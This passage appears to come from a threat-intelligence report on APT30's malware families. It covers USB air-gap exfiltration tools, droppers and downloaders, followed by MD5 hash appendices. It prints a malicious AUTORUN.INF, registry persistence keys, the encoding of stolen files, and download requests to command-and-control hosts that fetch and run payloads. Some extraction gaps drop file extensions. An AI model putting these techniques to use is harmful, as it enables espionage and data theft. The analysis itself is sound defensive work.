HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun = 0x9f
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = 0x02
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = 0x01
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\
CheckedValue = 0x00
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\
CheckedValue = 0xffffffff
SHIPSHAPE searches for fixed and removable drives (DRIVE_FIXED, DRIVE_REMOVABLE). If a detected
drive is less than 10,000,000,000 bytes (10GB) in size or was attached to the system after SHIPSHAPE
performed its initial drive scan, SHIPSHAPE looks for the file ldupver.txt on the drive and parses the file
for version information if the file is present. If the version listed in the file is greater than the malware’s
current version (“50” for this sample), SHIPSHAPE will look for the file AUTORUN.INF on the drive and
execute the “open” variable from the file, likely in an attempt to self-update.
SHIPSHAPE will create (or update, if already present), the following AUTORUN.INF file on the drive:
[AutoRun]
open=keybd.exe
shellexecute=keybd.exe
shell\Auto\command=keybd.exe
shell=Auto
In addition, for drives that pass the size check (e.g., less than 10GB), SHIPSHAPE modifies folders and
files on the drive with the or x extension. SHIPSHAPE sets the hidden attribute on the original
folder or file and copies a new file to the drive using the same name with an .exe extension. For folders,
SHIPSHAPE copies the contents of the file KB925273-dir.log from the SHIPSHAPE-infected computer
to the drive; for files, SHIPSHAPE copies the contents of the file KB936891-doc.log. The malware will
skip over any paths on the drive beginning with XP-Update, msdn, Recycled, or $LDDATA$. 44
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
53
SHIPSHAPE may use the following files (where [Install Path] is the path where SHIPSHAPE is
installed on the victim computer:
Table 16: Files used by SHIPSHAPE malware
File Action
[Install Path]\KB914268-inf.log Copied to keybd.exe on the removable disk
Copied to [Install Path]\vers.ini
[Install Path]\KB925273-dir.log Replaces directories on removable disk
[Install Path]\KB936891-doc.log Replaces , x files on removable disk
[Install Path]\ldjs.txt Activity log
upnum.txt Present in malware strings, but not used by this version
[Install Path]\KB952567-mouse.log List of paths to be created on the removable disk and the files
to be copied
[Install Path]\NameList Copied to the root of the removable disk
ldupver.txt Used to store a version number (“50” for this variant) on a
removable disk.
SPACESHIP
Similar to SHIPSHAPE, SPACESHIP samples have been identified with compile times ranging from
2006 to 2014. SPACESHIP searches for files with a specified set of file extensions and copies them to
a removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive,
which could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is
then used to steal documents from the air-gapped system, copying them to a removable drive inserted
into the SPACESHIP-infected system.
The SPACESHIP sample 11876eaadeac34527c28f4ddfadd1e8d was compiled on 23 August,
2012. When executed, the malware creates two events named “MicrosoftShipTrExit” and
“MicrosoftShipTrHaveExit” along with a mutex named “MicrosoftShipTrZJ”.
The malware copies itself to %HOMEPATH%\My Documents\Visual Studio 2005\MSDEV\FoxPro\VFP6.
EXE. To maintain persistence, the malware creates a shortcut in the user’s Startup folder named VFP6.
lnk using the comment “Visual FoxPro” and the target path %HOMEPATH%\My Documents\Visual Studio
2005\MSDEV\FoxPro\VFP6.EXE (all %HOMEPATH% references are expanded).
As part of the installation process, SPACESHIP creates the registry key HKEY_LOCAL_MACHINE\Software\
Microsoft\ShipTr with the following value and data:
Value: lnk
Data: WGQ7/mol
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
54
Similar to other APT30 malware, the data is the name of SPACESHIP’s shortcut file, with each character
incremented by one.
SPACESHIP also creates the following directories:
%HOMEPATH%\My Documents\Visual Studio 2005\MSDEV\FoxPro\Docs
%HOMEPATH%\My Documents\Visual Studio 2005\MSDEV\FoxPro\Docs\ldf
SPACESHIP first scans for files matching the pattern ldmap*.* in %HOMEPATH%\Documents\Visual
Studio 2005\MSDEV\FoxPro\Docs\ldf. If a file is not found or is too old, the malware deletes the files
ldmap.txt and Info.txt45 from %HOMEPATH%\My Documents\Visual Studio 2005\MSDEV\FoxPro\
Docs\. The malware then recursively scans each directory and logs all files contained in each folder (file
size and last modified) in a new Info.txt file.
SPACESHIP will look for configuration data stored in the file %HOMEPATH%\My Documents\Visual Studio
2005\MSDEV\FoxPro\ld.ini. The malware extracts the following keys from the sections:
[DirMap]
GetIt=[Integer]
[Piece]
Size=[Integer]
[UpData]
DirAndType=[String]
[UpDataTime]
Day=[Integer]
SPACESHIP will scan the folders “My Documents” (CSIDL_PERSONAL), “Desktop” (CSIDL_DESKTOP), and
“My Recent Documents” (CSIDL_RECENT; the malware parses the .lnk file target paths for specified file
types) and will search for files with the following extensions:
Table 17: SPACESHIP targeted file extensions
File Extension Document Type
Microsoft Word document
x Microsoft Word document
.max MAX source code file (?)
Adobe Acrobat Portable Document Format
.pgp Pretty Good Privacy
.rhs unknown
.rtf Rich Text Format
.tif Tagged Image Format graphics file
.wpd Word Perfect Document
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
55
SPACESHIP can also target files based on the last modified date using the UpDataTime/Day in the ld.ini
configuration file.
Identified files are copied to the %HOMEPATH%\Visual Studio 2005\MSDEV\FoxPro\Docs\ldf directory
and saved with an .ldf extension. The .ldf files are first compressed using zlib then each byte is rotated
4 positions and XOR-encoded with 0x23.
SPACESHIP monitors for removable drives to be inserted into the system. When a drive is attached,
SPACESHIP checks for the presence of specific files on the removable drive.
If the file [Drive Letter]:\msdn\d.ini is found, SPACESHIP copies it to %HOMEPATH%\Documents\
Visual Studio 2005\MSDEV\FoxProld.ini.46
If the file [Drive Letter]:\msdn\KB947652-ver.log is present, SPACESHIP copies it to %HOMEPATH%\
Documents\Visual Studio 2005\MSDEV\FoxPro\KB947652-ver.log. SPACESHIP reads the contents
of the file and compares it with its current version (the string “5.0” for this variant). If the strings do
not match, SPACESHIP copies [Drive Letter]:\XP-Update\KB863113-ld.log to %HOMEPATH%\
Documents\Visual Studio 2005\MSDEV\FoxPro\~ld.exe and executes the file.
SPACESHIP copies files in the %HOMEPATH%\Documents\Visual Studio 2005\MSDEV\FoxPro\Docs\ldf
directory to the removable drive in the folder [Drive Letter]:\Recycled. A desktop.ini file is created
that configures the directory to be opened using Recycler instead of Windows Explorer; this prevents a
user from seeing the copied files using Windows Explorer.
FLASHFLOOD
FLASHFLOOD appears to be an older piece of malware, or possibly one less frequently found “in the
wild”; identified samples were compiled as early as 2005, but are less common (or nonexistent?) after
2009. FLASHFLOOD has some similarities to SPACESHIP, in that it will search for and archive files that
match a configurable pattern; it even uses the same encoding process on archived files. One difference is
that FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the
removable drive to the FLASHFLOOD-infected system. This may simply be yet another means to identify
any “interesting” files for data theft, including those that happen to reside on a removable drive inserted
into the victim computer. Alternately, FLASHFLOOD may have been designed to copy files that had been
placed on a removable drive (perhaps by SPACESHIP), possibly copied from an “interesting” location
such as an air-gapped network. This theory is bolstered by the fact that one of the default file extensions
searched for by FLASHFLOOD is .ldf, the extension used by SPACESHIP for copied and encoded files.
FLASHFLOOD may also log or copy additional data from the victim computer, such as system information
or contacts.
The FLASHFLOOD sample 5d4f2871fd1818527ebd65b0ff930a77 was compiled on 17 February, 2009.
When executed, the malware creates a mutex named “MicrosoftFlashZJ” and also creates two events
named “MicrosoftFlashExit” and “MicrosoftFlashHaveExit”. If the following registry key is not
present, the malware creates it and continues the installation process:
Key: HKLM\Software\Microsoft\GetInf
Value: pid
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
56
Data: [Encoded filename of implant]
The filename is encoded by incrementing the hex value of each ASCII character by one.
FLASHFLOOD copies itself to the file C:~a, then copies that file to %SystemDrive%\Program Files\
Outlook Express\msinm.exe. The malware changes to the target directory, executes msinm.exe and
exits.
To maintain persistence, FLASHFLOOD creates the following registry value:
Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Value: msinm.exe
Data: [Path to install]
FLASHFLOOD attempts to read the file %WINDIR%\FILETYPE.INI for a list of file patterns of interest. If
the file does not exist the malware uses the following default file extensions:
Table 18: Default file extensions searched for by FLASHFLOOD
File Extension Document Type
Microsoft Word document
x Microsoft Word document
.ldf File extension used by SPACESHIP for copied and encoded files
.max Autodesk 3ds Max CAD file
Adobe Acrobat Portable Document Format
.pgp Pretty Good Privacy
.rhs unknown
.rtf Rich Text Format
.tif Tagged Image Format graphics file
.wpd Word Perfect Document
FLASHFLOOD creates the following directories, used to store malware log data and copied files of
interest:
%WINDIR%\$NtUninstallKB885884$\
%WINDIR%\$NtUninstallKB885884$\FlashFiles
%WINDIR%\$NtUninstallKB885884$\LastFiles
%WINDIR%\$NtUninstallKB885884$\RecentFiles
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
57
During initialization, FLASHFLOOD queries the registry value HKLM\SYSTEM\
CurrentControlSet\Services\SENS\Parameters\ServiceDll and logs the result to
%WINDIR%\$NtUninstallKB885884$\Info.txt.47 The file Info.txt is a general log file used by
FLASHFLOOD to store information collected from the system.
FLASHFLOOD also logs information stored in the Windows Address Book using the IAddrBook
interface.48 Information logged includes User, Nick, E-mail and Type.
FLASHFLOOD parses the shortcut (.lnk) files from the user’s “My Recent Documents” folder and
archives the target files to %WINDIR%\$NtUninstallKB885884$\RecentFiles. The malware uses the same
format for archiving files as SPACESHIP; the original files are copied and an .ldf extension is added. The
files are then zlib compressed and each byte is rotated 4 positions and XOR-encoded with 0x23.
FLASHFLOOD creates the file %WINDIR%\FILETIME.DAT and writes the current system time to the file in
FILETIME format. 49 The file is likely used to ensure the malware collects only recent files.
FLASHFLOOD scans connected drives and the directories “Desktop”, “Temporary Internet Files” and
“TEMP” for files that match the patterns of interest (obtained from FILETYPE.INI or the default set of
file extensions). Matching files are archived to %WINDIR%\$NtUninstallKB885884$\LastFiles.
For drives attached to the system after FLASHFLOOD initially executes, the malware scans for files
matching the patterns of interest. The malware’s behavior differs slightly depending on the size of the
detected drive.
For drives with a capacity less than 2,500,000,000 bytes (approximately 2.5 GB),50
FLASHFLOOD scans the entire drive and will archive any files of interest found on the drive to
%WINDIR%\$NtUninstallKB885884$\FlashFiles, using the archive method (compress, rotate bytes,
XOR) described above. For any files found in the $LDDATA$ or RECYCLED directories, FLASHFLOOD will
copy the file directly 51 (no archiving is performed) and delete the original file from the detected drive.
For drives with a capacity greater than 2,500,000,000 bytes, FLASHFLOOD will only scan the
directories $LDDATA$ and RECYCLED (if present). Any files found in these directories are copied to
%WINDIR%\$NtUninstallKB885884$\FlashFiles and the original files are deleted.
In both cases, details of the scan are logged to %WINDIR%\$NtUninstallKB885884$\OtherInfo.txt.
MISCELLANEOUS TOOLS
In addition to the malware listed above, APT30 has used a variety of droppers, downloaders, and other
utilities. In some cases, instead of directly installing a backdoor via a malicious document, APT30 will
install a stage one downloader that attempts to retrieve a second stage backdoor (often NETEAGLE) from
a specified location.
MILKMAID / ORANGEADE Droppers and CREAMSICLE Downloader
MILKMAID and ORANGEADE are two dropper families typically installed via a malicious attachment, such
as a malicious Word document. Both droppers have been observed to drop variants of the CREAMSICLE
downloader. MILKMAID drops a variant of CREAMSICLE implemented as a stand-alone executable, where
the slightly older ORANGEADE drops a variant of CREAMSICLE implemented as a DLL. 52
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
58
Each dropper extracts its version of CREAMSICLE and creates a shortcut (.lnk) file that references the
file to be downloaded by CREAMSICLE; that is, the dropper sets up persistence for the second stage
downloaded file.
“India deploys world’s largest military transport plane ” (md5 hash
7d775a39ecd517cee4369c672e0e4da7) is an example of an exploit document – one built with a common
document weaponizer that appears to be shared across multiple threat groups – that drops MILKMAID
and the EXE variant of CREAMSICLE. The document creates the file firefox.exe (MILKMAID) and a non-
malicious decoy document (Wor ) in the user’s %TEMP% directory, executes firefox.exe, and displays
the non-malicious document. MILKMAID extracts a compressed PE (readme.lz) from its resource
section, decompresses it, and writes it to %APPDATA%\Norton360\Engine\5.1.0.29 as wssfmgr.exe
(CREAMSICLE).
MILKMAID creates the shortcut file Symantec LiveUpdate.lnk in the user’s Startup folder
(%USERPROFILE%\Start Menu\Programs\Startup) with the target path %APPDATA%\Norton360\
Engine\5.1.0.29\ccSvcHst.exe (%APPDATA% is expanded). Finally, MILKMAID launches CREAMSICLE
(wssfmgr.exe).
CREAMSICLE attempts to download an encoded executable from a specified location using the following
HTTP request:
Figure 32: CREAMSICLE download request
GET /stactivex/update1.htm HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: www.creammemory.com
Cache-Control: no-cache
The downloaded file is decoded, written to disk as %APPDATA%\Norton360\Engine\5.1.0.29\ccSvcHst.
exe, and padded with 51,200,000 null bytes. CREAMSICLE does not appear to execute the downloaded
file, presumably relying on Windows to do so (using the shortcut file in the user’s Startup folder) the next
time the user logs in.
BACKBEND and GEMCUTTER Downloaders
BACKBEND and GEMCUTTER are older downloaders that have been previously used by APT30.
BACKBEND
BACKBEND is a secondary downloader used as a backup mechanism in the case the primary backdoor
is removed. The BACKBEND sample af504e86416c5f643e96f6e5e69566f0 was compiled on 16
August 2007. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or
MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware
exits.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
59
If BACKBEND is not running from the C:\Program Files\Internet Explore folder as iexplore.exe, it
creates the folder and copies itself as iexplore.exe to that location.
Next, if the current execution path of the malware process is not
copies itself to that location to achieve persistence. Finally, BACKBEND starts the C:\Program Files\
Internet Explore\iexplore.exe process by providing the current path of the malware as the first
command line parameter.
If the malware process executable file path is C:\Program Files\Internet Explore\iexplore.exe,
BACKSPACE deletes the file given by the first command line parameter passed in. Then, the malware
downloads a file from hxxp://www.cbkjdxf[.]com/04-1/04-1.htm and saves it under Windows
directory as netsvc.exe. 54 BACKSPACE starts a new process using the full path of the downloaded file
(%windir%\netsvc.exe) and deletes
GEMCUTTER
GEMCUTTER is used in a similar capacity as BACKBEND, but maintains persistence by creating a
Windows registry run key.
The GEMCUTTER sample bf8616bbed6d804a3dea09b230c2ab0c was compiled on 15 February, 2009.
The malware starts by creating MicrosoftGMMExit and MicrosoftGMMHaveExit as non-signaled events.
GEMCUTTER then queries for the registry value HKEY_LOCAL_MACHINE\Software\Microsoft\GetMM\
pid. If the value does not exist, the malware sets the registry value to the encoded malware process
filename (each filename character incremented by one).
GEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of
GEMCUTTER is executing. If the mutex doesn’t exist, the malware creates it and continues execution;
otherwise, the malware signals the MicrosoftGMMExit event.
The malware performs cleanup by deleting the registry value with the same name as the malware
filename under the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run registry
key and the file with the same name as the malware itself in the %sysdir% directory.
If GEMCUTTER is not running from %sysdir% as CTFM0N.xxx (the file extension is excluded in the check),
the malware copies itself to that location. The malware then starts a new process by providing %sysdir%\
CTFM0N.exe as the executable file path, and the current process exits.
If GEMCUTTER is running from %sysdir% as CTFM0N.xxx, the malware creates a new registry value
under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, with the value and
data set to CTFM0N.EXE. The registry value HKEY_LOCAL_MACHINE\Software\Microsoft\GetMM\pid is set
to the DUGN1O/fyf (CTFM0N.EXE with each character incremented by 1).
GEMCUTTER checks for the existence of the mutex MicrosoftZj (associated with BACKSPACE). If the
mutex doesn’t exist, GEMCUTTER downloads a file from hxxp://www.lisword[.]com/HM/Update.htm
and saves it under %windir% as netsvc.exe. A new process is started using %windir%\netsvc.exe55 as
the executable file path.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
60
APPENDIX B
MD5 HASHES
Below are md5 hash values for a representative sample of APT30 malware.
MD5 Hash Malware Family
002e27938c9390a942cf4b4c319f1768 BACKSPACE
062fe1336459a851bd0ea271bb2afe35 BACKSPACE
09010917cd00dc8ddd21aeb066877aa2 BACKSPACE
0fcb4ffe2eb391421ec876286c9ddb6c BACKSPACE
12e1dcd71693b6f875a98aefbd4ec91a BACKSPACE
1f64afa4069036513604cbf651e53e0d BACKSPACE
29395c528693b69233c1c12bef8a64b3 BACKSPACE
37e568bed4ae057e548439dc811b4d3a BACKSPACE
40f47850c5ebf768fd1303a32310c73e BACKSPACE
414854a9b40f7757ed7bfc6a1b01250f BACKSPACE
428fc53c84e921ac518e54a5d055f54a BACKSPACE
4c10a1efed25b828e4785d9526507fbc BACKSPACE
4c6b21e98ca03e0ef0910e07cef45dac BACKSPACE
4e5c116d874bbaaf7d6dadec7be926f5 BACKSPACE
550459b31d8dabaad1923565b7e50242 BACKSPACE
59e055cee87d8faf6f701293e5830b5a BACKSPACE
5ae51243647b7d03a5cb20dccbc0d561 BACKSPACE
5b590798da581c894d8a87964763aa8b BACKSPACE
62e5d5e244059dc02654f497401615cc BACKSPACE
65232a8d555d7c4f7bc0d7c5da08c593 BACKSPACE
853a20f5fc6d16202828df132c41a061 BACKSPACE
95bfe940816a89f168cacbc340eb4a5f BACKSPACE
9c0cad1560cd0ffe2aa570621ef7d0a0 BACKSPACE
a5ca2c5b4d8c0c1bc93570ed13dcab1a BACKSPACE
a9e8e402a7ee459e4896d0ba83543684 BACKSPACE
acb2ba25ef225d820ac8a5923b746cb8 BACKSPACE
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
61
Below are md5 hash values for a representative sample of APT30 malware.
MD5 Hash Malware Family
b2138a57f723326eda5a26d2dec56851 BACKSPACE
b590c15499448639c2748ff9e0d214b2 BACKSPACE
b7b282c9e3eca888cbdb5a856e07e8bd BACKSPACE
ba80e3ad617e6998f3c4b003397db840 BACKSPACE
c95cd106c1fecbd500f4b97566d8dc96 BACKSPACE
d38e02eac7e3b299b46ff2607dd0f288 BACKSPACE
d8e68db503f4155ed1aeba95d1f5e3e4 BACKSPACE
d93026b1c6c828d0905a0868e4cbc55f BACKSPACE
db3e5c2f2ce07c2d3fa38d6fc1ceb854 BACKSPACE
df1799845b51300b03072c6569ab96d5 BACKSPACE
e26a2afaaddfb09d9ede505c6f1cc4e3 BACKSPACE
e3ae3cbc024e39121c87d73e87bb2210 BACKSPACE
e62a63307deead5c9fcca6b9a2d51fb0 BACKSPACE
ec3905d8e100644ae96ad9b51d701a7f BACKSPACE
ed151602dea80f39173c2f7b1dd58e06 BACKSPACE
07bb30a2a42423e54f70af61e20edca3 BACKSPACE
08f299c2d8cfe1ae64d71dfb15fe6e8d BACKSPACE
139158fe63a0e46639cc20b754a7c38c BACKSPACE
4a41c422e9eb29f5d722700b060bca11 BACKSPACE
646e2cfa6aa457013769e2b89454acf7 BACKSPACE
948a53450e1d7dc7535ea52ca7d5bddd BACKSPACE
a2e0203e665976a13cdffb4416917250 BACKSPACE
ad044dc0e2e1eaa19cf031dbcff9d770 BACKSPACE
af1c1c5d8031c4942630b6a10270d8f4 BACKSPACE
c6e388ee5269239070e5ad7336d0bf59 BACKSPACE
c9484902c7f1756b26244d6d644c9dd5 BACKSPACE
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
62
Below are md5 hash values for a representative sample of APT30 malware.
MD5 Hash Malware Family
cc06815e8d8c0083263651877decb44b BACKSPACE
dc95b0e8ecb22ad607fc912219a640c1 BACKSPACE
f97ec83d68362e4dff4756ed1101fea8 BACKSPACE
572c9cd4388699347c0b2edb7c6f5e25 BACKSPACE
6e689351d94389ac6fdc341b859c7f6f BACKSPACE
b5546842e08950bc17a438d785b5a019 BACKSPACE
010ca5e1de980f5f45f9d82027e1606c BACKSPACE
0570066887f44bc6c82ebe033cad0451 BACKSPACE
0a4fdacde69a566f53833500a0d53a35 BACKSPACE
1133fe501fa4691b7f52e53706c80df9 BACKSPACE
2a2b22aa94a59575ca1dea8dd489d2eb BACKSPACE
2d75de9e1bb58fe61fd971bb720a49b7 BACKSPACE
40601cf29c1bbfe0942d1ac914d8ce27 BACKSPACE
44992068aab25daa1decae93b25060af BACKSPACE
49ee6365618b2a5819d36a48131e280c BACKSPACE
4b8531d294c020d5f856b58a5a23b238 BACKSPACE
4ee00c46da143ba70f7e6270960823be BACKSPACE
5ddbd80720997f7a8ff53396e8e8b920 BACKSPACE
65b984b198359003a5a3b8aaf91af234 BACKSPACE
6791254f160e98ac1f46b4d506b695ad BACKSPACE
7b111e1054b6b929de071c4f48386415 BACKSPACE
8022a4136a6200580962da94f3cdb905 BACKSPACE
8214b0e18fbcd5db6b008884e7685f2c BACKSPACE
8da9373fc5b8320fb04d6202ca1eb6f1 BACKSPACE
9c31551cd8087072d08c9004c0ce76c5 BACKSPACE
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
63
Below are md5 hash values for a representative sample of APT30 malware.
MD5 Hash Malware Family
9cbcc68c9b913a5fda445fbc7558c658 BACKSPACE
9e3ef98abcfffcf3205261e09e06cba6 BACKSPACE
ab153afbfbcfc8c67cf055b0111f0003 BACKSPACE
c90f798ccfbedb4bbe6c4568e0f05b68 BACKSPACE
cb1087b2add3245418257d648ac9e9a7 BACKSPACE
cd1aa1c8cdf4a4ba8dc4309ce30ec263 BACKSPACE
d55514d8b97999453621a8614090cbf0 BACKSPACE
d8248be5ed0f2f8f9787be331a18c36b BACKSPACE
da92b863095ee730aef6c6c541ab7697 BACKSPACE
f4a648a2382c51ca367be87d05628cff BACKSPACE
ff00682b0b8c8d13b797d722d9048ea2 BACKSPACE
0cdc35ffc222a714ee138b57d29c8749 BACKSPACE
10aa368899774463a355f1397e6e5151 BACKSPACE
3166baffecccd0934bdc657c01491094 BACKSPACE
d28d67b4397b7ce1508d10bf3054ffe5 BACKSPACE
310a4a62ba3765cbf8e8bbb9f324c503 BACKSPACE
23813c5bf6a7af322b40bd2fd94bd42e BACKSPACE
6508ee27afe517aa846f9447faef59b8 BACKSPACE
78c4fcee5b7fdbabf3b9941225d95166 BACKSPACE
8c713117af4ca6bbd69292a78069e75b BACKSPACE
8c9db773d387bf9b3f2b6a532e4c937c BACKSPACE
ebf42e8b532e2f3b19046b028b5dfb23 BACKSPACE
fe211c7a081c1dac46e3935f7c614549 BACKSPACE
6f931c15789d234881be8ae8ccfe33f4 BACKSPACE
1dbb584e19499e26398fb0a7aa2a01b7 BACKSPACE
37aee58655f5859e60ece6b249107b87 BACKSPACE
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
64
Below are md5 hash values for a representative sample of APT30 malware.
MD5 Hash Malware Family
4154548e1f8e9e7eb39d48a4cd75bcd1 BACKSPACE
71f25831681c19ea17b2f2a84a41bbfb BACKSPACE
8ff473bedbcc77df2c49a91167b1abeb BACKSPACE
a813eba27b2166620bd75029cc1f04b0 BACKSPACE
b4ae0004094b37a40978ef06f311a75e BACKSPACE
c4dec6d69d8035d481e4f2c86f580e81 BACKSPACE
021e134c48cd9ce9eaf6a1c105197e5d NETEAGLE (Scout)
5eaf3deaaf2efac92c73ada82a651afe NETEAGLE (Scout)
7c307ca84f922674049c0c43ca09bec1 NETEAGLE (Scout)
b8617302180d331e197cc0433fc5023d NETEAGLE (Scout)
e6289e7f9f26be692cbe6f335a706014 NETEAGLE (Scout)
95bb314fe8fdbe4df31a6d23b0d378bc NETEAGLE (Norton)
d97aace631d6f089595f5ce177f54a39 NETEAGLE (Norton)
0c4fcef3b583d0ffffc2b14b9297d3a4 SHIPSHAPE
1612b392d6145bfb0c43f8a48d78c75f SHIPSHAPE
168d207d0599ed0bb5bcfca3b3e7a9d3 SHIPSHAPE
1e6ee89fddcf23132ee12802337add61 SHIPSHAPE
42ccbccf48fe1cb63a81c9f094465ae2 SHIPSHAPE
4f00235b5208c128440c5693b7b85366 SHIPSHAPE
53f1358cbc298da96ec56e9a08851b4b SHIPSHAPE
5dd625af837e164dd2084b1f44a45808 SHIPSHAPE
9e27277ef0b6b25ccb2bb79dbf7554a7 SHIPSHAPE
b249bcf741e076f11b6c9553f6104f16 SHIPSHAPE
bbb3cb030686748b1244276e15085153 SHIPSHAPE
c2acc9fc9b0f050ec2103d3ba9cb11c0 SHIPSHAPE
e39756bc99ee1b05e5ee92a1cdd5faf4 SHIPSHAPE
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
65
Below are md5 hash values for a representative sample of APT30 malware.
MD5 Hash Malware Family
f18be055fae2490221c926e2ad55ab11 SHIPSHAPE
01d2383152795e4ec98b874cd585da30 SPACESHIP
08b54f9b2b3fb19e388d390d278f3e44 SPACESHIP
11876eaadeac34527c28f4ddfadd1e8d SPACESHIP
28f2396a1e306d05519b97a3a46ee925 SPACESHIP
80e39b656f9a77503fa3e6b7dd123ee3 SPACESHIP
8e2eee994cd1922e82dea58705cc9631 SPACESHIP
b6c08fd8a9f32a17c3550d3b2d302dc5 SPACESHIP
c4c068200ad8033a0f0cf28507b51842 SPACESHIP
d591dc11ecffdfaf1626c1055417a50d SPACESHIP
e9e514f8b1561011b4f034263c33a890 SPACESHIP
1b81b80ff0edf57da2440456d516cc90 FLASHFLOOD
5d4f2871fd1818527ebd65b0ff930a77 FLASHFLOOD
74b87086887e0c67ffb035069b195ac7 FLASHFLOOD
af670600dee2bf13a68eb962cce8f122 FLASHFLOOD
b5a343d11e1f7340de99118ce9fc1bbb FLASHFLOOD
fad06d7b4450c4631302264486611ec3 FLASHFLOOD
49aca228674651cba776be727bdb7e60 MILKMAID
5c7a6b3d1b85fad17333e02608844703 MILKMAID
649fa64127fef1305ba141dd58fb83a5 MILKMAID
9982fd829c0048c8f89620691316763a MILKMAID
baff5262ae01a9217b10fcd5dad9d1d5 MILKMAID
b249bcf741e076f11b6c9553f6104f16 SHIPSHAPE
bbb3cb030686748b1244276e15085153 SHIPSHAPE
c2acc9fc9b0f050ec2103d3ba9cb11c0 SHIPSHAPE
e39756bc99ee1b05e5ee92a1cdd5faf4 SHIPSHAPE
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
66
Below are md5 hash values for a representative sample of APT30 malware.
MD5 Hash Malware Family
592381dfa14e61bce089cd00c9b118ae ORANGEADE
b493ad490b691b8732983dcca8ea8b6f ORANGEADE
b83d43e3b2f0b0a0e5cc047ef258c2cb ORANGEADE
35dfb55f419f476a54241f46e624a1a4 CREAMSICLE
4fffcbdd4804f6952e0daf2d67507946 CREAMSICLE
597805832d45d522c4882f21db800ecf CREAMSICLE
6bd422d56e85024e67cc12207e330984 CREAMSICLE
82e13f3031130bd9d567c46a9c71ef2b CREAMSICLE
b79d87ff6de654130da95c73f66c15fa CREAMSICLE
44b98f22155f420af4528d17bb4a5ec8 BACKBEND
6ba315275561d99b1eb8fc614ff0b2b3 BACKBEND
ee1b23c97f809151805792f8778ead74 BACKBEND
bf8616bbed6d804a3dea09b230c2ab0c GEMCUTTER
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
67
APPENDIX C
ENDNOTES
1 While binary compile times can be modified or faked, we believe that compile dates for APT30 malware are reliable. Given
several hundred malware samples, the compile dates show a fairly regular distribution over the years 2005 – present. In
addition, registration dates for the earliest known APT30 domains also support origins dating back to the same time frame.
2 We were able to verify that each file’s icon type (Adobe or Word) was consistent with the letter used (p or
w). Although we were only able to identify one malicious document used to deploy a ZRLnk variant (md5 hash
d2661543c3c456f5fafdd97e31aaff17), the document type (an RTF file, typically opened by Microsoft Word) was also
consistent with the version convention.
3 We did not have conclusive data to interpret the meaning of the last character ‘N’ and ‘Y’, present in some samples. Some
evidence suggests that it may represent the inclusion or exclusion of additional malware features, such as the ability to
bypass personal firewalls; this appears to be true for at least one variant of BACKSPACE (“Zj Listen”).
4 The use of mutexes and events also supports version control, ensuring that the newer version of the malware executed
during the self-update process replaces the previous version.
5 See Appendix A for a detailed description of BACKSPACE malware.
6 While the controller software refers to itself as “NetEagle,” it is used to manage backdoor clients for the malware we
call BACKSPACE (also known as “Lecna”). The malware we call NETEAGLE uses a different set of commands and is
not compatible with the “NetEagle” controller. In an attempt to avoid confusion, we will refer to the controller as the
“BACKSPACE controller,” since it is used to manage BACKSPACE clients.
7 This aligns with early BACKSPACE compile dates of 2005.
8 BACKSPACE samples with md5 hash values acb2ba25ef225d820ac8a5923b746cb8 and
c90f798ccfbedb4bbe6c4568e0f05b68 are two examples.
9 Additional paths with slight variations have also been observed in FLASHFLOOD, such as
%WINDIR%\$NtUninstallKB885884$.
10 A controller that could be freely copied and distributed would erode the market for future custom software purchases.
11 See Appendix for detailed analysis of both BACKSPACE and NETEAGLE.
12 For example, the BACKSPACE B and Y commands; see Appendix for details.
13 See Appendix for detailed analysis.
14 http://www.asean.org/asean/about-asean
15 http://www.asean.org/news/item/eighteenth-asean-summit-jakarta-7-8-may-2011
16 http://www.asean.org/news/asean-statement-communiques/item/joint-statement-the-seventh-asean-plus-three-labour-
ministers-meeting-7th-almm3-phnom-penh-11-may-2012
17 http://maritimesecurity.asia/free-2/asean-2/asean-china-talk-on-east-sea/
18 http://www.aseanindia.com/summit-2012/
19 http://en.wikipedia.org/wiki/List_of_Secretaries-General_of_the_Association_of_Southeast_Asian_Nations
20 http://www.asean.org/news/asean-secretariat-news/item/asean-today-2
21 For the “ZJ Listen” variants, the “Y” vs. “N” in the version number appears to differentiate between variants that attempt
to bypass certain host-based firewalls by generating mouse-click events on dialog box buttons. The “Y” variants include
this feature; the “N” variants do not.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
68
